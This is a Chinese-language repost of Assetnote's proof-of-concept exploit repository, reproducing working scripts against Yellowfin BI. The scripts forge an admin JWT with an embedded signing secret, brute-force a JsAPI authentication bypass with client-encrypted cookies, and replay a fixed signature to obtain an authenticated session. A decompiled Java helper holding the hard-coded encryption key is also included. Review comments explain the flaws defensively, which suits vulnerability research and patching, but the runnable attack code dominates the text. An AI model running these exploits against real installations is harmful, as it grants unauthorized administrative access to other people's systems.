由 Assetnote 安全研究团队编写的漏洞利用(PoC)代码存储库

作者:Sec-Labs | 发布时间:

项目地址

https://github.com/assetnote/exploits

相关脚本

AccPrivEsc_REST.py

import jwt, json
import requests, sys
import time, datetime

# Command-line inputs: base URL of the Yellowfin instance under test, the
# user name and password of an existing account, and the identifier that the
# __main__ block later writes into the token's "person" claim.
yf_base_url = sys.argv[1]
email = sys.argv[2]
password = sys.argv[3]
UUID = sys.argv[4]

# HS256 secret that the __main__ block uses both to verify a server-issued
# access token and to sign a modified one. It is a constant in this script, not
# a value fetched from the target, so verification can only succeed when the
# server signs with this same value.
# NOTE(review): presumably this secret ships inside the product -- confirm
# against the vendor advisory. Defensive takeaway: a JWT signing secret has to
# be generated per deployment and be rotatable; a value shared by every
# installation lets any holder mint tokens the server will accept.
key = """q0x3DBLMJyteqkbUIx+7NzotD1K46kvfj7TW7i2ID4lBFyB9wse3cRw0buRrfKjzEuw5VySDrDsG\neyAPUukScQ=="""

def get_refresh_token(username,password):
    """Log in with a user name and password and return the refresh token.

    Sends a JSON body to ``{yf_base_url}/api/refresh-tokens`` and returns the
    ``securityToken`` field of the JSON reply. The HTTP status is not checked,
    so an error reply surfaces as a JSON or ``KeyError`` exception.
    """
    now_ms = int(round(time.time() * 1000))

    request_headers = {
        "Authorization": f"YELLOWFIN ts={now_ms}, nonce=random",
        "Content-Type": "application/json",
        "Accept": "application/vnd.yellowfin.api-v1+json",
    }

    credentials = {
        "userName": username,
        "password": password,
        "clientOrgRef": "default_org",
    }

    response = requests.request(
        "POST",
        url=f"{yf_base_url}/api/refresh-tokens",
        headers=request_headers,
        data=json.dumps(credentials),
    )
    return json.loads(response.text)["securityToken"]

def get_access_token(refresh_token):
    """Exchange a refresh token for an access token.

    POSTs to ``{yf_base_url}/api/access-tokens`` with the refresh token in the
    Authorization header and returns the ``securityToken`` field of the JSON
    reply. The HTTP status is not checked.
    """
    endpoint = f"{yf_base_url}/api/access-tokens"
    now_ms = int(round(time.time() * 1000))

    response = requests.post(
        url=endpoint,
        headers={
            "Accept": "application/vnd.yellowfin.api-v1+json",
            "Authorization": f"YELLOWFIN ts={now_ms}, nonce=random, token={refresh_token}",
            "Content-Type": "application/json",
        },
    )
    body = json.loads(response.text)
    return body["securityToken"]

def get_roles(token):
    """Return the raw body of ``GET {yf_base_url}/api/roles`` for *token*.

    The body is returned as text whatever the HTTP status, so the caller sees
    either the role list or the server's error document.
    """
    endpoint = f"{yf_base_url}/api/roles"
    now_ms = int(round(time.time() * 1000))

    response = requests.get(
        url=endpoint,
        headers={
            "Accept": "application/vnd.yellowfin.api-v1+json",
            "Authorization": f"YELLOWFIN ts={now_ms}, nonce=random, token={token}",
            "Content-Type": "application/json",
        },
    )
    return response.text

if __name__ == '__main__':
    # Baseline: authenticate through the normal two-step flow as the supplied
    # account and show the roles that account is allowed to list.
    testyRTok = get_refresh_token(email,password)
    testyATok = get_access_token(testyRTok)
    print("LOG: GOT TOKEN ONE")
    print(f"LOG: Roles For LOW PRIV USER: {get_roles(testyATok)}")
    # jwt.decode() checks the HS256 signature with `key` before returning the
    # claims, so getting past this line shows the server signed the token with
    # the constant embedded in this script.
    testyATok = jwt.decode(testyATok,key,algorithms=["HS256"])
    print("LOG: Forging New Token")
    # The claim set is edited client-side and re-signed with the same secret.
    # The server has no way to tell this token from one it issued itself, which
    # is why a signing secret that is known outside the server defeats the
    # whole token scheme.
    # NOTE(review): a server-side check that the "person"/"role" claims match
    # the account that obtained the refresh token would be one detection point
    # -- confirm what the fixed release actually does.
    testyATok["person"] = UUID
    testyATok["role"] = "YFADMIN"
    print(f"LOG: Attempting To Login As User ID: {UUID}")
    adminATok = jwt.encode(testyATok, key, algorithm="HS256")
    print(f"LOG: Roles For ADMIN: {get_roles(adminATok)}")

AuthBypass_JSAPI.py

import requests, os, uuid
# Target base URL from the command line. `os.sys` is the sys module reached
# through the os module's namespace; `import sys` is the conventional spelling.
url = os.sys.argv[1]

# Module-level session shared by loginAs() and adminReq(). The initial GET is
# presumably there to collect the server's session cookie before any POST.
s = requests.Session()
s.get(url)

def encrypt(txt):
	"""Return the first line printed by the external command ``java Enc <txt>``.

	The Enc program is the Java listing shown further down this page; it
	encrypts its argument with constants embedded in that code.
	"""
	# NOTE(review): txt is appended to a shell command line without quoting.
	# The only callers here pass str(int) and a fixed literal, but any other
	# input would be interpreted by the shell; an argument list passed to
	# subprocess.run() avoids that.
	return os.popen("java Enc "+txt).read().split('\n')[0]

def loginAs(uuid):
	"""POST an "auth" call to /JsAPI with two client-built encrypted cookies.

	The parameter shadows the imported ``uuid`` module inside this function;
	it is the identity string to place in the EXTAPI-IPID cookie. Returns None:
	the response is stored in a local and never inspected.
	"""
	# Both cookie values are produced locally by encrypt(), i.e. with key
	# material that is constant in the Enc listing rather than held only by the
	# server. Defensive takeaway: a cookie is only evidence of identity if the
	# client cannot create a valid one by itself.
	cookies = {
		"EXTAPI-IPID":encrypt(uuid),
		"EXTAPI-REFID":encrypt("quickLogon")
	}
	data = {
		"api" : "auth",
		"callback":"pew",
	}
	r=s.post(url+"/JsAPI?version=3.0",data=data,cookies=cookies)

def adminReq():
	"""Fetch /MIEntry.i4 with the shared session and return the body text.

	A fresh random ``tab_token`` is generated for every call.
	"""
	target = url+f"/MIEntry.i4;tab_token={uuid.uuid4()};m=1?REQUESTTOKEN=null"
	return s.get(target).text

if __name__ == '__main__':
	# Repeats the login attempt for the integer identities 0..999 and prints
	# only the length of the follow-up page, which the operator compares by
	# eye; nothing here decides success automatically.
	# Log-side indicator (hedged): many POSTs to /JsAPI carrying EXTAPI-IPID /
	# EXTAPI-REFID cookies from one client, each on a brand-new session.
	for ID in range(0,1000):
		# Rebinds the module-level `s`, so loginAs() and adminReq() use a
		# fresh session (and cookie jar) on every iteration.
		s = requests.Session()
		s.get(url)
		loginAs(str(ID))
		x=adminReq()
		print(f"uuid: {ID}, l: {len(x)}")

AuthBypass_STORY.py

import requests, sys, uuid

# Target base URL (first command-line argument).
url = sys.argv[1]

# Second command-line argument; sent unchanged as the "ipPerson" form field.
ID = sys.argv[2]

"""
The Private Key

-----BEGIN PRIVATE KEY-----
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
-----END PRIVATE KEY-----
"""

# The bare string on the next line is a no-op expression used as a comment. It
# states that the signature covers the storyUUID and ts request parameters,
# which this script fixes to "PEWPEW" and "XXD".
"""IS query params storyUUID + ts in this case PEWPEW+XXD"""
# Pre-computed Base64 signature sent as the "s" form field. Because it is a
# constant, the script needs no key at run time.
# NOTE(review): that one fixed signature is expected to validate on any target
# suggests the verifying key pair is the same on every installation, and that
# "ts" is not checked for freshness ("XXD" is not a timestamp) -- both are
# inferences from this script; confirm against the vendor advisory.
validSig = """FeHGWgaVoDHPbZYf0+I6BSAHBSacV/2MjbVtnaHLbnuW3cr0sLs2rwo1MWtZ1mtmNwjLLY1nXfZX+BL9FMwc4poix6WpEvQTGr0oxOmOQe82SF0/iJV8FRYNZPEJ8vVjuMh9c7zxo6A1zEqWRiTdWx5HFvF+saEIug6ujYIXx8jptzxMzkRn77FIx4McnPBLlfoodjkKXufrsK2JBOvqXjOsgJqv9SdZqcbm9LnQ4GolYGCHvsLZ9MTHFzIS37TNjRULVupdC92f+90Any6FvIYMsGiozp/c235+xPV68WNmLgLFsYyRR7RjN4oWq7yb+T5hIhlQnJr8CIej2eVq6w=="""

if __name__ == '__main__':
	# Fresh session; the first GET is presumably there to obtain a JSESSIONID.
	s = requests.Session()
	s.get(url)

	# One form POST to /StoryBody.i4. The only per-run input is ipPerson;
	# storyUUID, ts and the signature are constants. The response is discarded:
	# what matters to the script is the state left on the session cookie.
	# Log-side indicator (hedged): POSTs to /StoryBody.i4 that carry ipPerson
	# and ipOrg fields from a client that has not logged in.
	s.post(
		url+"/StoryBody.i4",
		data = {
			"storyUUID": "PEWPEW",
			"ts": "XXD",
			"s":validSig,
			"action":"WHATEVER",
			"ipPerson":ID,
			"ipOrg":"1"
		}
	)

	# Prints the HTTP status code of /logonCheck.i4, not a boolean, despite
	# the label.
	print(f"Is Authenticated: {s.get(url+'/logonCheck.i4').status_code}")

	# NOTE(review): this writes a live session identifier to stdout; treat any
	# captured output as a credential.
	print(f"Authenticated JSESSIONID: {s.cookies.get('JSESSIONID')}")

	# Reads an admin page with the same session as evidence of the session's
	# privilege level.
	print(f"Licence: {s.get(url+f'/MIAdminLicenceAjax.i4;tab_token={uuid.uuid4()};m=1?REQUESTTOKEN=null').text}")

Enc.java

import java.util.Arrays;
import java.util.UUID;
import java.security.spec.InvalidKeySpecException;
import java.security.NoSuchAlgorithmException;
import javax.crypto.spec.SecretKeySpec;
import javax.crypto.spec.PBEKeySpec;
import java.nio.BufferUnderflowException;
import java.nio.ByteBuffer;
import java.security.spec.AlgorithmParameterSpec;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.SecretKey;
import java.security.Key;
import javax.crypto.Cipher;
import java.security.spec.KeySpec;
import javax.crypto.spec.DESedeKeySpec;
import javax.crypto.SecretKeyFactory;
import java.io.IOException;
import java.security.GeneralSecurityException;
import java.nio.charset.StandardCharsets;
import java.io.FilterOutputStream;
import java.io.FilterInputStream;
import java.io.ObjectInputStream;
import java.io.ByteArrayInputStream;
import java.io.BufferedOutputStream;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.BufferedInputStream;
import java.io.FileInputStream;
import java.io.File;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.io.ByteArrayOutputStream;
import java.io.Serializable;


/**
 * Command-line wrapper: encrypts the first argument with CryptoHelperSimple,
 * using that class's built-in default password, and prints the Base64 result.
 */
class Enc {
    public static void main(String[] args) {
        final String plaintext = args[0];
        // A null password selects the constant default inside CryptoHelperSimple.
        final CryptoHelperSimple helper = new CryptoHelperSimple(null, plaintext);
        final String encoded = helper.encryptToString();
        System.out.println(encoded);
    }
}




/**
 * Decompiled helper that encrypts or decrypts one string with a
 * password-derived AES-256-GCM key.
 *
 * Review note (defensive): when no password is supplied the class falls back
 * to a constant embedded in the code, and getAesIv() always returns the same
 * 12 bytes, which are used both as the PBKDF2 salt and as the GCM IV on
 * encryption. Key and nonce are therefore identical for every message and for
 * every holder of this code, so a ciphertext neither hides its plaintext from,
 * nor proves its origin to, anyone who has these constants. AES-GCM also
 * requires that a nonce is never reused under one key. A sound design takes
 * the key from per-installation secret storage and draws a fresh random IV
 * for each message.
 */
class CryptoHelperSimple
{
    // F, A, D and E are not referenced by the methods below; the same values
    // appear there as inline literals (transformation name, 128-bit GCM tag,
    // 12-byte IV, 256-bit key).
    private static final String F = "AES/GCM/NoPadding";
    private static final int A = 128;
    private static final int D = 12;
    private static final int E = 256;
    // C: password the key is derived from. B: the text to encrypt or decrypt.
    private String C;
    private String B;
    // Same value as the default assigned in the constructor; not referenced.
    private static final String G = "$2a$10$EoSdh23ee1C9wtJOY5cv6uHrc0ilaqynX2nrR/hZyjuiE8YWeKVCa";
    
    /**
     * @param c password, or null to use the embedded default
     * @param b plaintext (for encryptToString) or Base64 ciphertext (for decryptFromString)
     */
    public CryptoHelperSimple(final String c, final String b) {
        if (c == null) {
            // Hard-coded fallback secret: identical wherever this code runs.
            this.C = "$2a$10$EoSdh23ee1C9wtJOY5cv6uHrc0ilaqynX2nrR/hZyjuiE8YWeKVCa";
        }
        else {
            this.C = c;
        }
        this.B = b;
    }
    
    /**
     * Encrypts B (UTF-8) and returns Base64 of IV || ciphertext || tag.
     * On any crypto or I/O failure prints "BAD" and returns the empty string.
     */
    public String encryptToString() {
        try {
            return Base64.encodeBytes(this.encryptAes(this.B.getBytes(StandardCharsets.UTF_8), this.getAesKey(this.C.toCharArray())));
        }
        catch (GeneralSecurityException | IOException ex) {  
            System.out.println("BAD");
        }
        return "";
    }
    
    /**
     * Base64-decodes B and decrypts it with AES-GCM; if that fails, retries
     * with Triple DES keyed directly from the password bytes.
     * Returns the empty string when both attempts fail.
     */
    public String decryptFromString() {
        try {
            return this.decryptAes(Base64.decode(this.B), this.getAesKey(this.C.toCharArray()));
        }
        catch (GeneralSecurityException | IOException ex) {
            try {
                // Legacy fallback. "DESede" with no mode/padding uses the
                // provider's defaults (typically ECB with PKCS5 padding), which
                // is unauthenticated; a failed GCM tag check therefore silently
                // downgrades to a cipher with no integrity protection.
                final SecretKey generateSecret = SecretKeyFactory.getInstance("DESede").generateSecret(new DESedeKeySpec(this.C.getBytes("UTF-8")));
                final Cipher instance = Cipher.getInstance("DESede");
                // 2 == Cipher.DECRYPT_MODE
                instance.init(2, generateSecret);
                return new String(instance.doFinal(Base64.decode(this.B)), "UTF-8");
            }
            catch (IOException | GeneralSecurityException ex2) {
                // Unused declaration left behind by the decompiler.
                final Object cause;
                System.out.println("BAD");
            }
        }
        return "";
    }
    
    /**
     * AES-GCM encrypts input under key with the constant IV from getAesIv()
     * and a 128-bit tag.
     *
     * @return IV followed by the cipher output (ciphertext with tag appended)
     */
    public byte[] encryptAes(final byte[] input, final SecretKey key) throws IOException, GeneralSecurityException {
        final byte[] aesIv = this.getAesIv();
        final Cipher instance = Cipher.getInstance("AES/GCM/NoPadding");
        // 1 == Cipher.ENCRYPT_MODE
        instance.init(1, key, new GCMParameterSpec(128, aesIv));
        final byte[] doFinal = instance.doFinal(input);
        return ByteBuffer.allocate(aesIv.length + doFinal.length).put(aesIv).put(doFinal).array();
    }
    
    /**
     * Splits array into a 12-byte IV prefix and the remaining cipher output,
     * then AES-GCM decrypts and returns the plaintext as a UTF-8 string.
     *
     * @throws IOException if array is shorter than the IV
     * @throws GeneralSecurityException if the tag does not verify or the cipher fails
     */
    public String decryptAes(final byte[] array, final SecretKey key) throws IOException, GeneralSecurityException {
        final ByteBuffer wrap = ByteBuffer.wrap(array);
        // getAesIv() is used here only to obtain a 12-byte buffer; its
        // contents are overwritten with the IV carried in the message.
        final byte[] aesIv = this.getAesIv();
        try {
            wrap.get(aesIv);
        }
        catch (BufferUnderflowException ex) {
            throw new IOException("Buffer Underflow");
        }
        final byte[] array2 = new byte[wrap.remaining()];
        try {
            wrap.get(array2);
        }
        catch (BufferUnderflowException ex2) {
            throw new IOException("Buffer Underflow");
        }
        final Cipher instance = Cipher.getInstance("AES/GCM/NoPadding");
        // 2 == Cipher.DECRYPT_MODE
        instance.init(2, key, new GCMParameterSpec(128, aesIv));
        return new String(instance.doFinal(array2), StandardCharsets.UTF_8);
    }
    
    /**
     * Derives a 256-bit AES key from password with PBKDF2-HMAC-SHA256,
     * 65536 iterations, salted with the constant bytes from getAesIv().
     * A constant salt means equal passwords always yield equal keys.
     */
    public SecretKey getAesKey(final char[] password) throws NoSuchAlgorithmException, InvalidKeySpecException {
        return new SecretKeySpec(SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256").generateSecret(new PBEKeySpec(password, this.getAesIv(), 65536, 256)).getEncoded(), "AES");
    }
    
    /**
     * Returns the first 12 bytes of the textual form of the name-based UUID
     * of the fixed string "YellowfinReporting". The result is the same on
     * every call.
     */
    public byte[] getAesIv() {
        return Arrays.copyOf(UUID.nameUUIDFromBytes("YellowfinReporting".getBytes(StandardCharsets.UTF_8)).toString().getBytes(StandardCharsets.UTF_8), 12);
    }
}

class Base64
{
    public static final boolean ENCODE = true;
    public static final boolean DECODE = false;
    private static final int B = 76;
    private static final byte F = 61;
    private static final byte G = 10;
    private static final byte[] E;
    private static final byte[] C;
    private static final byte H = -9;
    private static final byte A = -5;
    private static final byte D = -1;
    
    private Base64() {
    }
    
    private static byte[] C(final byte[] array) {
        return B(array, 3);
    }
    
    private static byte[] B(final byte[] array, final int n) {
        final byte[] array2 = new byte[4];
        B(array, 0, n, array2, 0);
        return array2;
    }
    
    private static byte[] B(final byte[] array, final int n, final int n2, final byte[] array2, final int n3) {
        final int n4 = ((n2 > 0) ? (array[n] << 24 >>> 8) : 0) | ((n2 > 1) ? (array[n + 1] << 24 >>> 16) : 0) | ((n2 > 2) ? (array[n + 2] << 24 >>> 24) : 0);
        switch (n2) {
            case 3: {
                array2[n3] = Base64.E[n4 >>> 18];
                array2[n3 + 1] = Base64.E[n4 >>> 12 & 0x3F];
                array2[n3 + 2] = Base64.E[n4 >>> 6 & 0x3F];
                array2[n3 + 3] = Base64.E[n4 & 0x3F];
                return array2;
            }
            case 2: {
                array2[n3] = Base64.E[n4 >>> 18];
                array2[n3 + 1] = Base64.E[n4 >>> 12 & 0x3F];
                array2[n3 + 2] = Base64.E[n4 >>> 6 & 0x3F];
                array2[n3 + 3] = 61;
                return array2;
            }
            case 1: {
                array2[n3] = Base64.E[n4 >>> 18];
                array2[n3 + 1] = Base64.E[n4 >>> 12 & 0x3F];
                array2[n3 + 3] = (array2[n3 + 2] = 61);
                return array2;
            }
            default: {
                return array2;
            }
        }
    }
    
    public static String encodeObject(final Serializable s) {
        return encodeObject(s, true);
    }
    
    public static String encodeObject(final Serializable obj, final boolean b) {
        ByteArrayOutputStream byteArrayOutputStream = null;
        java.io.OutputStream out = null;
        ObjectOutputStream objectOutputStream = null;
        try {
            byteArrayOutputStream = new ByteArrayOutputStream();
            out = new OutputStream(byteArrayOutputStream, true, b);
            objectOutputStream = new ObjectOutputStream(out);
            objectOutputStream.writeObject(obj);
        }
        catch (IOException ex) {
            ex.printStackTrace();
            return null;
        }
        finally {
            try {
                objectOutputStream.close();
            }
            catch (Exception ex2) {}
            try {
                out.close();
            }
            catch (Exception ex3) {}
            try {
                byteArrayOutputStream.close();
            }
            catch (Exception ex4) {}
        }
        return new String(byteArrayOutputStream.toByteArray());
    }
    
    public static String encodeBytes(final byte[] array) {
        return encodeBytes(array, true);
    }
    
    public static String encodeBytes(final byte[] array, final boolean b) {
        if (array == null) {
            return null;
        }
        return encodeBytes(array, 0, array.length, b);
    }
    
    public static String encodeBytes(final byte[] array, final int n, final int n2) {
        return encodeBytes(array, n, n2, true);
    }
    
    public static String encodeBytes(final byte[] array, final int n, final int n2, final boolean b) {
        final int n3 = n2 * 4 / 3;
        final byte[] bytes = new byte[n3 + ((n2 % 3 > 0) ? 4 : 0) + (b ? (n3 / 76) : 0)];
        int i = 0;
        int length = 0;
        final int n4 = n2 - 2;
        int n5 = 0;
        while (i < n4) {
            B(array, i + n, 3, bytes, length);
            n5 += 4;
            if (b && n5 == 76) {
                bytes[length + 4] = 10;
                ++length;
                n5 = 0;
            }
            i += 3;
            length += 4;
        }
        if (i < n2) {
            B(array, i + n, n2 - i, bytes, length);
            length += 4;
        }
        return new String(bytes, 0, length);
    }
    
    @Deprecated
    public static String encodeString(final String s) {
        return encodeString(s, true);
    }
    
    public static String encodeStringUTF8(final String s) {
        return encodeStringUTF8(s, true);
    }
    
    @Deprecated
    public static String encodeString(final String s, final boolean b) {
        return encodeBytes(s.getBytes(), b);
    }
    
    public static String encodeStringUTF8(final String s, final boolean b) {
        byte[] bytes;
        try {
            bytes = s.getBytes("UTF-8");
        }
        catch (Exception ex) {
            return null;
        }
        return encodeBytes(bytes, b);
    }
    
    public static byte[] readFile(final String pathname, final boolean b) {
        return readFile(new File(pathname), b);
    }
    
    public static byte[] readFile(final File file, final boolean b) {
        byte[] array = new byte[100];
        Object o = null;
        int n = 0;
        InputStream inputStream = null;
        try {
            inputStream = new InputStream(new BufferedInputStream(new FileInputStream(file)), b);
            int read;
            while ((read = inputStream.read()) >= 0) {
                if (n >= array.length) {
                    final byte[] array2 = new byte[array.length << 1];
                    System.arraycopy(array, 0, array2, 0, array.length);
                    array = array2;
                }
                array[n++] = (byte)read;
            }
            o = new byte[n];
            System.arraycopy(array, 0, o, 0, n);
        }
        catch (IOException ex) {
            o = null;
        }
        finally {
            try {
                inputStream.close();
            }
            catch (Exception ex2) {}
        }
        return (byte[])o;
    }
    
    public static byte[] readFile(final java.io.InputStream in, final boolean b) {
        byte[] array = new byte[100];
        Object o = null;
        int n = 0;
        InputStream inputStream = null;
        try {
            inputStream = new InputStream(new BufferedInputStream(in), b);
            int read;
            while ((read = inputStream.read()) >= 0) {
                if (n >= array.length) {
                    final byte[] array2 = new byte[array.length << 1];
                    System.arraycopy(array, 0, array2, 0, array.length);
                    array = array2;
                }
                array[n++] = (byte)read;
            }
            o = new byte[n];
            System.arraycopy(array, 0, o, 0, n);
        }
        catch (IOException ex) {
            o = null;
        }
        finally {
            try {
                inputStream.close();
            }
            catch (Exception ex2) {}
        }
        return (byte[])o;
    }
    
    public static boolean writeFile(final byte[] array, final String pathname, final boolean b) {
        return writeFile(array, 0, array.length, new File(pathname), b);
    }
    
    public static boolean writeFile(final byte[] array, final File file, final boolean b) {
        return writeFile(array, 0, array.length, file, b);
    }
    
    public static boolean writeFile(final byte[] array, final int n, final int n2, final File file, final boolean b) {
        OutputStream outputStream = null;
        boolean b2 = false;
        try {
            outputStream = new OutputStream(new BufferedOutputStream(new FileOutputStream(file)), b);
            outputStream.write(array, n, n2);
            b2 = true;
        }
        catch (IOException ex) {
            b2 = false;
        }
        finally {
            try {
                outputStream.close();
            }
            catch (Exception ex2) {}
        }
        return b2;
    }
    
    public static String encodeFromFile(final String s) {
        final byte[] file = readFile(s, true);
        return (file == null) ? null : new String(file);
    }
    
    public static String encodeFromStream(final java.io.InputStream inputStream) {
        final byte[] file = readFile(inputStream, true);
        return (file == null) ? null : new String(file);
    }
    
    public static byte[] decodeFromFile(final String s) {
        return readFile(s, false);
    }
    
    public static boolean encodeToFile(final byte[] array, final String s) {
        return writeFile(array, s, true);
    }
    
    public static boolean decodeToFile(final byte[] array, final String s) {
        return writeFile(array, s, false);
    }
    
    /**
     * Decodes the 4-byte Base64 group at the start of array and returns
     * exactly the bytes it produced (one to three).
     */
    private static byte[] B(final byte[] array) {
        final byte[] scratch = new byte[3];
        final int decodedLen = A(array, 0, scratch, 0);
        final byte[] result = new byte[decodedLen];
        System.arraycopy(scratch, 0, result, 0, decodedLen);
        return result;
    }
    
    private static int A(final byte[] array, final int n, final byte[] array2, final int n2) {
        if (array[n + 2] == 61) {
            array2[n2] = (byte)(((Base64.C[array[n]] & 0xFF) << 18 | (Base64.C[array[n + 1]] & 0xFF) << 12) >>> 16);
            return 1;
        }
        if (array[n + 3] == 61) {
            final int n3 = (Base64.C[array[n]] & 0xFF) << 18 | (Base64.C[array[n + 1]] & 0xFF) << 12 | (Base64.C[array[n + 2]] & 0xFF) << 6;
            array2[n2] = (byte)(n3 >>> 16);
            array2[n2 + 1] = (byte)(n3 >>> 8);
            return 2;
        }
        try {
            final int n4 = (Base64.C[array[n]] & 0xFF) << 18 | (Base64.C[array[n + 1]] & 0xFF) << 12 | (Base64.C[array[n + 2]] & 0xFF) << 6 | (Base64.C[array[n + 3]] & 0xFF);
            array2[n2] = (byte)(n4 >> 16);
            array2[n2 + 1] = (byte)(n4 >> 8);
            array2[n2 + 2] = (byte)n4;
            return 3;
        }
        catch (Exception ex) {
            System.out.println("" + array[n] + ": " + Base64.C[array[n]]);
            System.out.println("" + array[n + 1] + ": " + Base64.C[array[n + 1]]);
            System.out.println("" + array[n + 2] + ": " + Base64.C[array[n + 2]]);
            System.out.println("" + array[n + 3] + ": " + Base64.C[array[n + 3]]);
            return -1;
        }
    }
    
    public static byte[] decode(final String s) {
        final byte[] bytes = s.getBytes();
        return decode(bytes, 0, bytes.length);
    }
    
    @Deprecated
    public static String decodeToString(final String s) {
        return new String(decode(s));
    }
    
    public static String decodeToUTF8String(final String s) {
        try {
            return new String(decode(s), "UTF-8");
        }
        catch (Exception ex) {
            return null;
        }
    }
    
    /**
     * Base64-decodes s and deserializes the bytes with Java native
     * serialization.
     *
     * Review note: ObjectInputStream.readObject() instantiates whatever
     * serializable classes the byte stream names, so this method must never be
     * given data from an untrusted source; where it cannot be removed, an
     * ObjectInputFilter allow-list is the standard containment. Nothing else
     * in this listing calls it.
     *
     * @return the deserialized object, or null after an IOException or
     *         ClassNotFoundException (the stack trace is printed)
     */
    public static Object decodeToObject(final String s) {
        // decode() returns null on a bad input character; that null would make
        // the ByteArrayInputStream constructor throw a NullPointerException,
        // which the catch clauses below do not handle.
        final byte[] decode = decode(s);
        java.io.InputStream in = null;
        ObjectInputStream objectInputStream = null;
        try {
            in = new ByteArrayInputStream(decode);
            objectInputStream = new ObjectInputStream(in);
            return objectInputStream.readObject();
        }
        catch (IOException ex) {
            ex.printStackTrace();
            return null;
        }
        catch (ClassNotFoundException ex2) {
            ex2.printStackTrace();
            return null;
        }
        finally {
            // Either reference may still be null here; the resulting
            // NullPointerException is swallowed by the empty catch blocks.
            try {
                ((ByteArrayInputStream)in).close();
            }
            catch (Exception ex3) {}
            try {
                objectInputStream.close();
            }
            catch (Exception ex4) {}
        }
    }
    
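    /**
     * Decodes n2 bytes of Base64 text that start at offset n of array.
     *
     * Fix: the loop previously read array[0 .. n2-1] and ignored the offset n,
     * so any call with n != 0 decoded the wrong bytes. Calls with n == 0 (the
     * only form used in this listing) behave exactly as before.
     *
     * Bytes the table marks as whitespace are skipped; decoding stops after
     * the group that contains '=' padding.
     *
     * @param array buffer holding Base64 text
     * @param n     index of the first byte to decode
     * @param n2    number of bytes to decode
     * @return the decoded bytes, or null if a byte that is neither Base64 nor
     *         whitespace is met (a message is written to stderr)
     */
    public static byte[] decode(final byte[] array, final int n, final int n2) {
        // Upper bound on the output size; trimmed to the real length below.
        final byte[] array2 = new byte[n2 * 3 / 4];
        int n3 = 0;
        final byte[] array3 = new byte[4];
        int n4 = 0;
        for (int i = n; i < n + n2; ++i) {
            // Only the low seven bits are used as the table index.
            final byte b = (byte)(array[i] & 0x7F);
            final byte b2 = Base64.C[b];
            // Table values below -5 mark bytes that are not valid Base64.
            if (b2 < -5) {
                System.err.println("Bad Base64 input character at " + i + ": " + array[i] + "(decimal)");
                return null;
            }
            // -1 is '=' padding, >= 0 is a sextet; -5 (whitespace) is skipped.
            if (b2 >= -1) {
                array3[n4++] = b;
                if (n4 > 3) {
                    n3 += A(array3, 0, array2, n3);
                    n4 = 0;
                    // 61 is '=': padding ends the data.
                    if (b == 61) {
                        break;
                    }
                }
            }
        }
        final byte[] array4 = new byte[n3];
        System.arraycopy(array2, 0, array4, 0, n3);
        return array4;
    }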
    
    static {
        E = new byte[] { 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 43, 47 };
        C = new byte[] { -9, -9, -9, -9, -9, -9, -9, -9, -9, -5, -5, -9, -9, -5, -9, -9, -9, -9, -9, -9, -9, -9, -9, -9, -9, -9, -9, -9, -9, -9, -9, -9, -5, -9, -9, -9, -9, -9, -9, -9, -9, -9, -9, 62, -9, -9, -9, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -9, -9, -9, -1, -9, -9, -9, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -9, -9, -9, -9, -9, -9, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -9, -9, -9, -9 };
    }
    
    public static class InputStream extends FilterInputStream
    {
        private boolean E;
        private int B;
        private byte[] C;
        private int D;
        private int G;
        private int A;
        private boolean F;
        
        public InputStream(final java.io.InputStream inputStream) {
            this(inputStream, false);
        }
        
        public InputStream(final java.io.InputStream inputStream, final boolean b) {
            this(inputStream, b, true);
        }
        
        public InputStream(final java.io.InputStream in, final boolean e, final boolean f) {
            super(in);
            this.F = f;
            this.E = e;
            this.D = (e ? 4 : 3);
            this.C = new byte[this.D];
            this.B = -1;
            this.A = 0;
        }
        
        @Override
        public int read() throws IOException {
            if (this.B < 0) {
                if (this.E) {
                    final byte[] array = new byte[3];
                    int n = 0;
                    for (int i = 0; i < 3; ++i) {
                        try {
                            final int read = this.in.read();
                            if (read >= 0) {
                                array[i] = (byte)read;
                                ++n;
                            }
                        }
                        catch (IOException ex) {
                            if (i == 0) {
                                throw ex;
                            }
                        }
                    }
                    if (n <= 0) {
                        return -1;
                    }
                    B(array, 0, n, this.C, 0);
                    this.B = 0;
                    this.G = 4;
                }
                else {
                    final byte[] array2 = new byte[4];
                    int j;
                    for (j = 0; j < 4; ++j) {
                        int read2;
                        do {
                            read2 = this.in.read();
                        } while (read2 >= 0 && Base64.C[read2 & 0x7F] <= -5);
                        if (read2 < 0) {
                            break;
                        }
                        array2[j] = (byte)read2;
                    }
                    if (j == 4) {
                        this.G = A(array2, 0, this.C, 0);
                        this.B = 0;
                    }
                    else {
                        if (j == 0) {
                            return -1;
                        }
                        throw new IOException("Improperly padded Base64 input.");
                    }
                }
            }
            if (this.B < 0) {
                throw new IOException("Error in Base64 code reading stream.");
            }
            if (this.B >= this.G) {
                return -1;
            }
            if (this.E && this.F && this.A >= 76) {
                this.A = 0;
                return 10;
            }
            ++this.A;
            final byte b = this.C[this.B++];
            if (this.B >= this.D) {
                this.B = -1;
            }
            return b & 0xFF;
        }
        
        @Override
        public int read(final byte[] array, final int n, final int n2) throws IOException {
            int i = 0;
            while (i < n2) {
                final int read = this.read();
                if (read >= 0) {
                    array[n + i] = (byte)read;
                    ++i;
                }
                else {
                    if (i == 0) {
                        return -1;
                    }
                    break;
                }
            }
            return i;
        }
    }
    
    public static class OutputStream extends FilterOutputStream
    {
        private boolean E;
        private int B;
        private byte[] C;
        private int D;
        private int A;
        private boolean F;
        
        public OutputStream(final java.io.OutputStream outputStream) {
            this(outputStream, true);
        }
        
        public OutputStream(final java.io.OutputStream outputStream, final boolean b) {
            this(outputStream, b, true);
        }
        
